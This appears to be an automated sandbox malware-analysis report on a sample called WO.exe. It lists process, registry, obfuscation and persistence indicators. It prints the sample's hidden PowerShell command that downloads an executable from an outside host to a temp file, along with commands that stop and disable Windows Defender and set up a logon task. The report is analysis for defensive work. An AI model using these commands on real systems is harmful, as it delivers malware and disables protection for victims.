Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: WO.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: reddit.exe.5.dr

Data Obfuscation

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" (observed 9 times)
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_000000014000D9C4
Source: WO.exe | Static PE information: section name: .code
Source: WO.exe.1.dr | Static PE information: section name: .code
Source: C:\Users\user\Desktop\WO.exe | Code function: 0_2_000000014001BD2E push rbx; ret 0_2_000000014001BD2F
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_0040B840 push eax; ret 6_2_0040B86E
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00405A5C push edx; ret 6_2_00405A7D
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00406200 push esi; iretd 6_2_0040620B
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_004032D4 push edx; retf 6_2_00403342
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_004056AF push eax; retn 000Ch 6_2_004056B0
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00407D07 push es; retf 6_2_00407D80
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00406D10 pushfd ; ret 6_2_00406D45
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_0040211C push eax; retf 6_2_00402128
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00407D20 push es; retf 6_2_00407D80
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00403331 push edx; retf 6_2_00403342
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Code function: 6_2_00407DB4 push ds; retf 6_2_00407DF6
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 17_2_000000014001BD2E push rbx; ret 17_2_000000014001BD2F
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 18_2_000000014001BD2E push rbx; ret 18_2_000000014001BD2F
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Code function: 48_2_000000014001BD2E push rbx; ret 48_2_000000014001BD2F
Source: reddit.exe.5.dr | Static PE information: section name: .text entropy: 7.006551052925149

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')" (observed 9 times)
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe (observed 8 times)
Source: C:\Windows\System32\cmd.exe | Process created: reg.exe (observed 12 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\reddit.exe
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe

Boot Survival

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net stop WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\WO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
